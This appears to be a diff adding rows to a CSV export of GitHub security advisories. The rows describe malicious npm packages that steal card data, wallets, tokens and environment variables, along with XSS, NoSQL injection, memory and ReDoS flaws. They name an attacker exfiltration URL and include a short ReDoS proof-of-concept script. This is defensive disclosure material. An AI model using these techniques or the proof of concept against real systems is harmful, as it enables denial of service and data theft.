+1.4.0,GHSA-c82c-8pjw-6829,2021-09-24T14:41:28Z,2020-09-01T19:41:45Z,,[],Malicious Package in @impala/bmap,"Version 1.0.3 of `@impala/bmap` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+## Recommendation
+
+If version 1.0.3 of this module is found installed you will want to replace it with a version before or after 1.0.3. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/'}]","[{'package': {'ecosystem': 'npm', 'name': '@impala/bmap'}, 'versions': ['1.0.3']}]","[{'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-c82c-8pjw-6829'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IMPALABMAP-451019'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/613'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:29:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jcmh-9fvm-j39w,2021-09-30T20:13:39Z,2020-09-03T19:42:23Z,,[],Malicious Package in body-parse-xml,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'body-parse-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1125'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vvfh-mvjv-w38q,2021-10-01T20:17:42Z,2020-09-04T15:28:19Z,,[],Malicious Package in babel-loadre,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'babel-loadre'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1349'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xcgx-27q5-7634,2021-10-01T20:59:32Z,2020-09-03T19:41:05Z,,[],Malicious Package in commanedr,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'commanedr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1388'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g53w-52xc-2j85,2021-10-04T19:11:02Z,2020-09-04T16:52:57Z,,['CVE-2013-7035'],Cross-Site Scripting in react,"Affected versions of `react` are vulnerable to Cross-Site Scripting (XSS). The package fails to properly sanitize input used to create keys. This may allow attackers to execute arbitrary JavaScript if a key is generated from user input.
+
+
+## Recommendation
+
+If you are using `react` 0.5.x, upgrade to version 0.5.2 or later.
+If you are using `react` 0.4.x, upgrade to version 0.4.2 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'react'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'react'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-7035'}, {'type': 'WEB', 'url': 'https://github.com/facebook/react/commit/393a889aaceb761f058b09a701f889fa8f8b4e64'}, {'type': 'WEB', 'url': 'https://github.com/facebook/react/commit/94a9a3e752fe089ab23f3a90c26d20d46d62ab10'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebook/react'}, {'type': 'WEB', 'url': 'https://reactjs.org/blog/2013/12/18/react-v0.5.2-v0.4.2.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:react:20131217'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-63xm-rx5p-xvqr,2021-08-26T15:11:21Z,2020-09-25T18:28:29Z,,['CVE-2020-15195'],Heap buffer overflow in Tensorflow,"### Impact
+The implementation of `SparseFillEmptyRowsGrad` uses a double indexing pattern:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L263-L269
+
+It is possible for `reverse_index_map(i)` to be an index outside of bounds of `grad_values`, thus resulting in a heap buffer overflow.
+
+### Patches
+We have patched the issue in 390611e0d45c5793c7066110af37c8514e6a6c54 and will release a patch release for all affected versions.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-63xm-rx5p-xvqr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15195'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/390611e0d45c5793c7066110af37c8514e6a6c54'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-119', 'CWE-122', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:15:00Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-77g4-36jp-5v3m,2020-08-31T18:09:58Z,2020-09-01T15:22:12Z,,['CVE-2016-10519'],Remote Memory Disclosure in bittorrent-dht,"Versions of `bittorrent-dht` prior to 5.1.3 are affected by a remote memory disclosure vulnerability. This vulnerability allows an attacker to send a specific series of of messages to a listening peer and get it to reveal internal memory.
+
+
+There are two mitigating factors here, that slightly reduce the impact of this vulnerability:
+
+1. Any modern kernel will zero out new memory pages before handing them off to a process. This means that only memory previously used and deallocated by the node process can be leaked.
+1. Node.js manages Buffers by creating a few large internal SlowBuffers, and slicing them up into smaller Buffers which are made accessible in JS. They are not stored on V8's heap, because garbage collection would interfere. The result is that only memory that has been previously allocated as a Buffer can be leaked.
+
+
+## Recommendation
+
+Update to version 5.1.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bittorrent-dht'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10519'}, {'type': 'WEB', 'url': 'https://github.com/feross/bittorrent-dht/issues/87'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/68'}]","{'cwe_ids': ['CWE-201'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:09:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7hvm-29rf-2gf2,2021-01-14T15:57:55Z,2020-09-01T16:08:58Z,,['CVE-2016-10647'],Downloads Resources over HTTP in node-air-sdk,"Affected versions of `node-air-sdk` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `node-air-sdk`.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.",[],"[{'package': {'ecosystem': 'npm', 'name': 'node-air-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10647'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/250'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:16:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-92xj-mqp7-vmcj,2022-12-03T04:06:21Z,2020-09-14T21:42:09Z,,['CVE-2020-7720'],Prototype Pollution in node-forge,The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. Note: version 0.10.0 is a breaking change removing the vulnerable functions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-forge'}, 'ecosystem_specific': {'affected_functions': ['forge.util.setPath']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7720'}, {'type': 'WEB', 'url': 'https://github.com/digitalbazaar/forge/commit/6a1e3ef74f6eb345bcff1b82184201d1e28b6756'}, {'type': 'PACKAGE', 'url': 'https://github.com/digitalbazaar/forge'}, {'type': 'WEB', 'url': 'https://github.com/digitalbazaar/forge/blob/master/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/digitalbazaar/forge/blob/master/CHANGELOG.md#removed'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-609293'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEFORGE-598677'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-14T21:41:51Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}"
+1.4.0,GHSA-9rwj-8mh9-4876,2021-09-30T21:23:53Z,2020-09-02T21:19:37Z,,[],Malicious Package in carloprojectdiscord,"All versions of `carloprojectdiscord` contain obfuscated malware that uploads Discord user tokens to a remote server. This allows attackers to make purchases on behalf of users if they have credit cards linked to their Discord accounts.
+
+
+## Recommendation
+
+Remove the package from your environment. Review your Discord account access and rotate tokens if possible. If a credit card was linked to a compromised account contact your credit card company.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'carloprojectdiscord'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/874'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-48hw-37g6-3gw4,2023-07-27T20:35:38Z,2020-09-03T02:35:41Z,,[],Malicious Package in mx-nested-menu,"Version 0.1.30 of `mx-nested-menu` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.1.29",[],"[{'package': {'ecosystem': 'npm', 'name': 'mx-nested-menu'}, 'versions': ['0.1.30']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/947'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q643-w9jp-q2qg,2020-08-31T19:00:05Z,2020-09-04T17:34:59Z,,[],Hardcoded Initialization Vector in parsel,"All versions of `parsel` have a default hardcoded initialization vector. In cases where the IV is not provided, the package defaults to a hardcoded IV which renders the cipher vulnerable to chosen plaintext attacks.
+
+
+## Recommendation
+
+The package is deprecated and will not be updated. Consider using an alternative package.",[],"[{'package': {'ecosystem': 'npm', 'name': 'parsel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1460'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g37j-v5gh-g25c,2021-09-30T17:14:07Z,2020-09-03T23:06:48Z,,[],Malicious Package in js-shi3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-shi3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1288'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hgr5-82rc-p936,2020-08-31T18:34:23Z,2020-09-01T21:24:41Z,,[],Cross-Site Scripting in md-data-table,"All versions of `md-data-table` are vulnerable to cross-site scripting (XSS). This vulnerability is exploitable if an attacker has control over data that is rendered by `mdt-row`
+
+
+## Recommendation
+
+As there is no fix for this vulnerability at this time we recommend either selecting another package to perform this functionality or properly sanitizing all user data prior to rendering with `md-data-table`",[],"[{'package': {'ecosystem': 'npm', 'name': 'md-data-table'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/748'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vf5m-q45w-8mh9,2021-09-30T17:01:14Z,2020-09-03T23:00:25Z,,[],Malicious Package in js-qha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-qha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1282'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-36r8-9qq7-mh43,2021-10-04T19:09:44Z,2020-09-03T17:02:40Z,,[],Malicious Package in we3b,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'we3b'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1415'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hwhq-3hrj-v6v5,2023-09-08T18:49:03Z,2020-09-01T19:00:54Z,,['CVE-2017-16081'],cross-env.js is malware,"The `cross-env.js` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
+
+All versions have been unpublished from the npm registry.
+
+
+## Recommendation
+
+
+As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
+
+If you have found this installed in your environment, you should:
+1. Delete the package
+2. Clear your npm cache
+3. Ensure it is not present in any other package.json files on your system
+4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
+
+Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.",[],"[{'package': {'ecosystem': 'npm', 'name': 'cross-env.js'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16081'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/520'}]","{'cwe_ids': ['CWE-506'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:26:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7w7c-867m-4mqc,2021-10-01T21:04:09Z,2020-09-03T17:04:55Z,,[],Malicious Package in rceat,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'rceat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1402'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2vqq-jgxx-fxjc,2021-09-30T22:07:26Z,2020-09-11T21:24:33Z,,[],Malicious Package in motiv.scss,"Version 0.4.20 of `motiv.scss` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'motiv.scss'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.20'}, {'fixed': '0.4.21'}]}], 'versions': ['0.4.20']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/939'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f72h-wf57-7xwh,2021-09-29T21:04:48Z,2020-09-03T21:58:34Z,,[],Malicious Package in buffer-xo2,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xo2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1248'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c2v2-7rcg-2ch7,2021-01-14T15:58:08Z,2020-09-01T15:17:48Z,,['CVE-2015-9239'],Regular Expression Denial of Service in ansi2html,"The `ansi2html` package is affected by a regular expression denial of service vulnerability when certain types of user input is passed in.
+
+
+## Proof of concept
+```
+var ansi2html = require('ansi2html')
+
+var start = process.hrtime();
+ansi2html(""[1111111111111111111111;0000000000000000000000"");
+console.log(process.hrtime(start));
+
+start = process.hrtime();
+ansi2html(""[1111111111111111111111;00000000000000000000000"");
+console.log(process.hrtime(start));
+
+start = process.hrtime();
+ansi2html(""[1111111111111111111111;000000000000000000000000"");
+console.log(process.hrtime(start));
+
+start = process.hrtime();
+ansi2html(""[1111111111111111111111;0000000000000000000000000000"");
+console.log(process.hrtime(start));
+```
+
+Results of the above
+```
+00:29:53-adam_baldwin~/tmp$ node test
+[ 0, 119615367 ]
+[ 0, 149934565 ]
+[ 0, 233325677 ]
+[ 3, 46582479 ]
+```
+
+
+## Recommendation
+
+At the time of this writing, February 2018, all versions of `ansi2html` remain vulnerable, and the package has not been updated for 4 years.
+
+In order to use this package safely, it is necessary to avoid passing user input to the package, or to limit the size of the input string to a size with a parse time you find acceptable. Unfortunately, the match time grows at quite a small character count, so it is unlikely for it to both allow strings of a useful size while protecting against the denial of service attack.
+
+In the case that user input of significant length must be parsed by ansi2html, the best mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.][available on npm](https://www.npmjs.com/search?q=ansi+html)",[],"[{'package': {'ecosystem': 'npm', 'name': 'ansi2html'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-9239'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/51'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:09:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f5cv-xrv9-r8w7,2021-09-24T20:58:36Z,2020-09-01T21:17:16Z,,[],NoSQL injection in express-cart,"Versions of `express-cart` before 1.1.8 are vulnerable to NoSQL injection.
+
+The vulnerability is caused by the lack of user input sanitization in the login handlers. In both cases, the customer login and the admin login, parameters from the JSON body are sent directly into the MongoDB query which allows to insert operators.
+
+These operators can be used to extract the value of the field blindly in the same manner of a blind SQL injection. In this case, the `$regex` operator is used to guess each character of the token from the start.
+
+
+## Recommendation
+
+Update to version 1.1.8 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'express-cart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.7'}}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/397445'}, {'type': 'PACKAGE', 'url': 'https://github.com/nodejs/security-wg'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/security-wg/blob/master/vuln/npm/472.json'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/724'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:33:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cv3v-7846-6pxm,2021-09-29T19:59:01Z,2020-09-03T21:15:19Z,,[],Unauthorized File Access in node-git-server,"Versions of `node-git-server` prior to 0.6.1 are vulnerable to Unauthorized File Access. It is possible to access any git repository by using absolute paths, which may allow attackers to access private repositories.
+
+
+## Recommendation
+
